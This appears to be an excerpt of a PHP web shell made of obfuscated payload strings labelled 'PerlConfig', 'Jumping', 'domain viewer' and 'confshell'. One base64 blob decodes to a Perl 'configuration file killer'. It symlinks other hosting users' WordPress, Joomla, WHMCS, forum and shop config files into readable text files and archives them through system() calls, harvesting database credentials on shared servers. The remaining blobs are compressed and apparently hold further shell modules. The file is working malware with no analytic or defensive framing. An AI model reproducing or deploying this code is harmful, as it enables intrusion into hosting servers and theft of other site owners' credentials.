551$mal = "eNqV0UtrAjEQAOC70P8wYHsRyRa8FYpQSR9QXAmCBxHJrkMSjDNhk/pA/O+uFuyx5javj4GZLrzJj68xzLhZTRqM8aGjcNe4hJKMI4SSbpUyJMcUwZHFNr/VR0wreDp+TqeTpZLvUkl1AtHTcS1q3ojeI8zHo36pFv8Jw2w8ZoBNpMuK+0HlyOQJ77aYJzT7TOCT3rqYdB7Dfd0280xE3dRWHLRl/lV/RP14bEfAphReisJ4rrQPvGt/TcboZK8BXy9eOBLBhiG9Dp5hrvrfizOeH7rw";
552//PerlConfig
553$gantengers="IyEvdXNyL2Jpbi9tYW5udSAtSS91c3IvbG9jYWwvYmFuZG1pbg0KcHJpbnQgIkNvbnRlbnQtdHlwZTogdGV4dC9odG1sXG5cbiI7DQpwcmludCc8IURPQ1RZUEUgaHRtbCBQVUJMSUMgIi0vL1czQy8vRFREIFhIVE1MIDEuMCBUcmFuc2l0aW9uYWwvL0VOIiAiaHR0cDovL3d3dy53My5vcmcvVFIveGh0bWwxL0RURC94aHRtbDEtdHJhbnNpdGlvbmFsLmR0ZCI+DQo8aHRtbCB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMTk5OS94aHRtbCI+DQo8aGVhZD4NCjxtZXRhIGh0dHAtZXF1aXY9IkNvbnRlbnQtTGFuZ3VhZ2UiIGNvbnRlbnQ9ImVuLXVzIiAvPg0KPG1ldGEgaHR0cC1lcXVpdj0iQ29udGVudC1UeXBlIiBjb250ZW50PSJ0ZXh0L2h0bWw7IGNoYXJzZXQ9dXRmLTgiIC8+DQo8c3R5bGUgdHlwZT0idGV4dC9jc3MiPg0KLmR6IHsNCmZvbnQtZmFtaWx5OiBUYWhvbWE7DQpmb250LXNpemU6IDE0cHg7DQpmb250LXdlaWdodDogYm9sZDsNCmNvbG9yOiAjMzMzM2ZmOw0KdGV4dC1hbGlnbjogY2VudGVyOw0KdGV4dC1zaGFkb3c6IGJsYWNrIDBweCAwcHggMnB4Ow0KfQ0KI2NoZWNrb3V0dGV4dGFyZWEgew0KDQp3ZWJraXQtYm9yZGVyLXJhZGl1czogMTVweDsNCg0KfQ0KOmhvdmVyI2NoZWNrb3V0dGV4dGFyZWEge29wYWNpdHk6IDAuNjsgYmFja2dyb3VuZC1jb2xvcjozMzMzMzN9DQo8L3N0eWxlPg0KPC9oZWFkPg0KJzsNCnN1YiBsaWx7DQooJHVzZXIpID0gQF87DQokbXNyID0gcXh7cHdkfTsNCiRrb2xhPSRtc3IuIi8iLiR1c2VyOw0KJGtvbGE9fnMvXG4vL2c7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1zaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1vcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9vc2NvbS9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLW9zY29tLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2UvaW5jbHVkZXMvY29uZmlndXJlLnBocCcsJGtvbGEuJy1vc2NvbW1lcmNlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL29zY29tbWVyY2VzL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictb3Njb21tZXJjZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc2hvcC9pbmNsdWRlcy9jb25maWd1cmUucGhwJywka29sYS4nLXNob3AyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3BwaW5nL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC1zaG9wcGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zYWxlL2luY2x1ZGVzL2NvbmZpZ3VyZS5waHAnLCRrb2xhLictc2FsZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hbWVtYmVyL2NvbmZpZy5pbmMucGhwJywka29sYS4nLWFtZW1iZXIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29uZmlnLmluYy5waHAnLCRrb2xhLictYW1lbWJlcjIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWVtYmVycy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1tZW1iZXJzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZpZy5waHAnLCRrb2xhLictMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9mb3J1bS9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtcy9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLWZvcnVtcy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9hZG1pbi9jb25mLnBocCcsJGtvbGEuJy01LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2FkbWluL2NvbmZpZy5waHAnLCRrb2xhLictNC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd3Avd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXdwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dQL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1XUC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93cC9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLWJldGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJlc3Mvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cDEzLXByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtd29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1dvcmRwcmVzcy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtV29yZHByZXNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dvcmRwcmVzcy9iZXRhL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy13b3JkcHJlc3MtYmV0YS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AxMy1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy93cC1jb25maWcucGhwJywka29sYS4nLXdwMTMtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2cvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1ibG9nLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JldGEvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1iZXRhLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Jsb2dzL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtYmxvZ3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9tZS93cC1jb25maWcucGhwJywka29sYS4nLXdwLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcHJvdGFsL3dwLWNvbmZpZy5waHAnLCRrb2xhLictd3AtcHJvdGFsLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1zaXRlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL21haW4vd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC1tYWluLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Rlc3Qvd3AtY29uZmlnLnBocCcsJGtvbGEuJy13cC10ZXN0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NvbmZfZ2xvYmFsLnBocCcsJGtvbGEuJy02LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvZGIucGhwJywka29sYS4nLTcudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY29ubmVjdC5waHAnLCRrb2xhLictOC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ta19jb25mLnBocCcsJGtvbGEuJy05LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2luY2x1ZGUvY29uZmlnLnBocCcsJGtvbGEuJy0xMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb29tbGEvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhMi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9wcm90YWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLXByb3RhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9qb28vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2Ntcy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtY21zLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NpdGUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLXNpdGUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbWFpbi9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbWFpbi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9uZXdzL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLWpvb21sYS1uZXdzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL25ldy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEtbmV3LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvbWUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictam9vbWxhLWhvbWUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvdmIvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC92YjMvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy12YjMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvY29uZmlnLnBocCcsJGtvbGEuJy1pbmNsdWRlcy12Yi50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htMTUudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2VudHJhbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tY2VudHJhbC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC93aG0vd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3dobS9XSE1DUy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tV0hNQ1MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htYy9XSE0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htYy1XSE0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htY3MudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1zdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3N1cHAvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VwcC50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3NlY3VyZS93aG0vY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLXdobS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9zZWN1cmUvd2htY3MvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictc3VjdXJlLXdobWNzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NwYW5lbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvcGFuZWwvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictcGFuZWwudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaG9zdC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2hvc3RpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictaG9zdGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9ob3N0cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1ob3N0cy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1qb29tbGEudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc3VibWl0dGlja2V0LnBocCcsJGtvbGEuJy13aG1jczIudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50cy9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnRzLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2NsaWVudC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZXMvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictY2xpZW50ZXMudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50ZS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvY2xpZW50c3VwcG9ydC9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy1jbGllbnRzdXBwb3J0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2JpbGxpbmcvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictYmlsbGluZy50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9tYW5hZ2UvY29uZmlndXJhdGlvbi5waHAnLCRrb2xhLictd2htLW1hbmFnZS50eHQnKTsNCnN5bWxpbmsoJy9ob21lLycuJHVzZXIuJy9wdWJsaWNfaHRtbC9teS9jb25maWd1cmF0aW9uLnBocCcsJGtvbGEuJy13aG0tbXkudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvbXlzaG9wL2NvbmZpZ3VyYXRpb24ucGhwJywka29sYS4nLXdobS1teXNob3AudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXplbmNhcnQudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvemVuY2FydC9pbmNsdWRlcy9kaXN0LWNvbmZpZ3VyZS5waHAnLCRrb2xhLictc2hvcC16ZW5jYXJ0LnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3Nob3AvaW5jbHVkZXMvZGlzdC1jb25maWd1cmUucGhwJywka29sYS4nLXNob3AtWkNzaG9wLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYudHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvc21mL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYyLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL2ZvcnVtL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYtZm9ydW0udHh0Jyk7DQpzeW1saW5rKCcvaG9tZS8nLiR1c2VyLicvcHVibGljX2h0bWwvZm9ydW1zL1NldHRpbmdzLnBocCcsJGtvbGEuJy1zbWYtZm9ydW1zLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwbG9hZC9pbmNsdWRlcy9jb25maWcucGhwJywka29sYS4nLXVwLnR4dCcpOw0Kc3ltbGluaygnL2hvbWUvJy4kdXNlci4nL3B1YmxpY19odG1sL3VwL2luY2x1ZGVzL2NvbmZpZy5waHAnLCRrb2xhLictdXAyLnR4dCcpOw0KfQ0KaWYgKCRFTlZ7J1JFUVVFU1RfTUVUSE9EJ30gZXEgJ1BPU1QnKSB7DQpyZWFkKFNURElOLCAkYnVmZmVyLCAkRU5WeydDT05URU5UX0xFTkdUSCd9KTsNCn0gZWxzZSB7DQokYnVmZmVyID0gJEVOVnsnUVVFUllfU1RSSU5HJ307DQp9DQpAcGFpcnMgPSBzcGxpdCgvJi8sICRidWZmZXIpOw0KZm9yZWFjaCAkcGFpciAoQHBhaXJzKSB7DQooJG5hbWUsICR2YWx1ZSkgPSBzcGxpdCgvPS8sICRwYWlyKTsNCiRuYW1lID1+IHRyLysvIC87DQokbmFtZSA9fiBzLyUoW2EtZkEtRjAtOV1bYS1mQS1GMC05XSkvcGFjaygiQyIsIGhleCgkMSkpL2VnOw0KJHZhbHVlID1+IHRyLysvIC87DQokdmFsdWUgPX4gcy8lKFthLWZBLUYwLTldW2EtZkEtRjAtOV0pL3BhY2soIkMiLCBoZXgoJDEpKS9lZzsNCiRGT1JNeyRuYW1lfSA9ICR2YWx1ZTsNCn0NCmlmICgkRk9STXtwYXNzfSBlcSAiIil7DQpwcmludCAnDQo8Ym9keSBjbGFzcz0iZHoiIGJnY29sb3I9ImJsYWNrIj4NCjxwPjxmb250IGNvbG9yPXdoaXRlPmNvbmZpZ3VyYXRpb24gZmlsZSBraWxsZXI8L3A+DQoNCjxzcGFuPjxmb250IGNvbG9yPSJ3aGl0ZSI+c3VwcGx5IHVzZXJuYW1lcyB0byBzeW1saW5rIGNvbmZpZ3VyYXRpb24gZmlsZXM8L2ZvbnQ+PC9zcGFuPjxiciAvPg0KPGJyIC8+PGZvcm0gbWV0aG9kPSJwb3N0Ij48c3Ryb25nPg0KPHRleHRhcmVhIGlkPSJjaGVja291dHRleHRhcmVhIiBuYW1lPSJwYXNzIiBzdHlsZT0iYm9yZGVyOjJweCBkYXNoZWQgcmVkOyB3aWR0aDogMzAwcHg7IGhlaWdodDogMjAwcHg7IGJhY2tncm91bmQtY29sb3I6YmxhY2s7IGZvbnQtZmFtaWx5OlRhaG9tYTsgZm9udC1zaXplOjlwdDsgY29sb3I6IHJlZCIgPjwvdGV4dGFyZWE+PGJyIC8+DQombmJzcDsNCjxwPg0KPGlucHV0IG5hbWU9IlN1Ym1pdDEiIHR5cGU9InN1Ym1pdCIgdmFsdWU9InNwaW4gaXQgOC0pIiBzdHlsZT0iYm9yZGVyOjFweCBkb3R0ZWQgIzAwRkZGRjsgd2lkdGg6IDk5OyBmb250LWZhbWlseTpUYWhvbWE7IGZvbnQtc2l6ZToxMHB0OyBjb2xvcjogYmxhY2s7IHRleHQtdHJhbnNmb3JtOnVwcGVyY2FzZTsgaGVpZ2h0OjIzOyBiYWNrZ3JvdW5kLWNvbG9yOiNGNEY0RjQ7IiAvPjwvcD4NCjwvZm9ybT48L3N0cm9uZz4NCic7DQp9ZWxzZXsNCkBsaW5lcyA9PCRGT1JNe3Bhc3N9PjsNCiR5ID0gQGxpbmVzOw0Kb3BlbiAoTVlGSUxFLCAiPnRhci50bXAiKTsNCnByaW50IE1ZRklMRSAidGFyIC1jemYgIi4kRk9STXt0YXJ9LiIudGFyICI7DQpmb3IgKCRrYT0wOyRrYTwkeTska2ErKyl7DQp3aGlsZShAbGluZXNbJGthXSA9fiBtLyguKj8pOng6L2cpew0KJmxpbCgkMSk7DQpwcmludCBNWUZJTEUgJDEuIi50eHQgIjsNCmZvcigka2Q9MTska2Q8MTg7JGtkKyspew0KcHJpbnQgTVlGSUxFICQxLiRrZC4iLnR4dCAiOw0KfQ0KfQ0KfQ0KcHJpbnQnPGJvZHkgY2xhc3M9ImR6IiBiZ2NvbG9yPSJibGFjayI+DQo8aDI+ZG9uZSA8L2gyPg0KPHA+Jm5ic3A7PC9wPic7DQppZigkRk9STXt0YXJ9IG5lICIiKXsNCm9wZW4oSU5GTywgInRhci50bXAiKTsNCkBsaW5lcyA9PElORk8+IDsNCmNsb3NlKElORk8pOw0Kc3lzdGVtKEBsaW5lcyk7DQpwcmludCc8cD48YSBocmVmPSInLiRGT1JNe3Rhcn0uJy50YXIiPjxmb250IGNvbG9yPSIjMDBGRjAwIj4NCjxzcGFuIHN0eWxlPSJ0ZXh0LWRlY29yYXRpb246IG5vbmUiPjwvc3Bhbj48L2ZvbnQ+PC9hPjwvcD4nOw0KfQ0KfQ0KcHJpbnQiDQo8L2JvZHk+DQo8L2h0bWw+";
554//Jumping
555$jumper="zVPdbtMwFL6ftHc4tSLZ0dKmwF2bpEgILkFar2CbghPbxCiJI9thK9MeiLfkOFnLygXXKErkfj/n15V1Y4BknlethLrlzuW3pO5EZR5uSZF5i6+A2rRu4D1SrxElW7i8YJHrIAfd6/Kb9Iw6rmTZGSFpDHkO6xh2qJpF1ChFNyC0ZOS9tcZuYH+UI/2pz1IvCvzY8AmlFJcXmdA/ThXpXhnMvB8t7/bNm7bNUqQL+Ev2nR84yuCL6Sotl9fGePgFZCW4l4x+ponXnWRxvCIIRg8feSfxuF3GMMcjcWjNSV8GYdnqTnu2RvBtNGCGe4HVKjPIntFU+jqdQZpQSyenVsAWz9IYHkPHwMjN8g6mtmED78wo+q8eriUX8CLG/zSBp7C4YaywWW4tPzDEotFJ686Q2vTqDND4a72F+0a3ki2UNIodZxE/TpfB2zBAvC/uxGwhDA29Bbxar1EXDSbkQS0eWPAkdDOPdyqix5IDP1ZIzfw6CaZQgtD2Z7hwaWM6mdLVybGiKXbU6rpsfNem9Lgt9ifmAn00VBpw7UqLKwqbYFPUQEytlsPomtnmkpMbk79kMVcy28I4wxPpq6twVgbj1g08RwDu5tlOE5Lh30hvPpixF7C4g4xDY6XKye6Qn7V03g4p/kGmWcqLrLIFnTe7K34D";
556//domain viewer
557$private="y8kvS1WozC9VCE7MKc5IVLDSAgA=";
558$zonekerupuk="rVVtb9s2EP5uwP/hqgWRDTiWnWRrIcvChjUFhmZJYbtfNhcGLZ8sIhQpUFRtt8h/31EvsfPidgVKwBB5R94999xDGqNEOe1WkJudwLDdMrg1TCODr+2Wxpx/QV8qiaN2K1JCaR9+GZQDyLJk0d1aq0Kuzipn7RsBtFuxkuasPP8mMyOoN8TlsGeVXqH2h9kWciX4CjYJNwgPnjOBsfHh8rl/w1cm8X+9vMi2tEqQrxPjXw4G5fK+3eIyK4yF/xjwT8F7HNXxeghS4DX0BhFKgzoMYqVTSNEkajWeOx9up7O5Q/6/udZKg287ggIjA+XJsfukmKOlfLOMbxdxrITaXhutu3S4IFmKBD4tMZfwA5UZrmT4hSRzlgRevSwZKMsJg6Wm5Y0yPEYNNxTBh6BqmdllNpxV4NyBTLAIEyUoNRnfoy6y4o7sddIVxuSnrGCLJcPFOSGoor9VKeMyB98ugwdFV0zOnUpA8NvrNyQZqAUEF4NzWh4kqILYoF4Too7/GG9eLFNuEX9morCGKcrVPs5aVcx4tuN2YjHRzyFpkOxyNAvDU1wITlGgM+iSncfQeRUXMrLsLXDLc5NDx4kKLRZccuN0u19XHMk0S3gO00jzzECRYw7Rx8k1XPOlZnrXg50qIC1yA1SJYUJAzDWtXpUgGCQa47GbGJP5nseK836WZH2JxkuZLJjwUHo2Z59AFpl1uuEPbA48Fjrd0X1Zpy3p95OFFfq/7lq5n7rtFt1RqAeRgyxKoIPbTKiVLW0unR40J+pu0DFgOZxUy+7+/EGoZmSKKu3UWw8iVcJxP+1NlYAp9mgf5X4/RXoiwWn6RrSRFtZoxu5iKZi8cx/TWEm/H6nUYzpK+Gf0smIpeJ7gajxww3/qq8EeVFAR1LS7wU1UEsIaLc0qkI9ZOyHGxvAgC+gcVlCaqRl0BylclPTgT9LG7YfZYnI1+zi5mU3+uJm+u5r0YPj/jlmyms37/fmGG9u4PcAXehKxHMGpqHFGz3t1PCl9euDU3G42m/4Bv9K+Ijsv53It0On+UFxbzLu/rq7fTil8zfK4ofu0Es1wbLtwmtBbm5Imx8NTEmmu5Hj4YjIr8UzjepGykhHHK19fegM00oMQ3r4P5p59n0P6Ch56pO8SIG4xKuF1u93nYZ/IsL61Tt+x4OjTyJGmlSBpEgZ5xuST/461RpRuaI8BYfHslvBQiM8yihy/i+eFRFRunebKSqLJdCTLkki9O7DbHhTC+N/fef9EtZFQJLOSSHut/gM=";
559//confshell
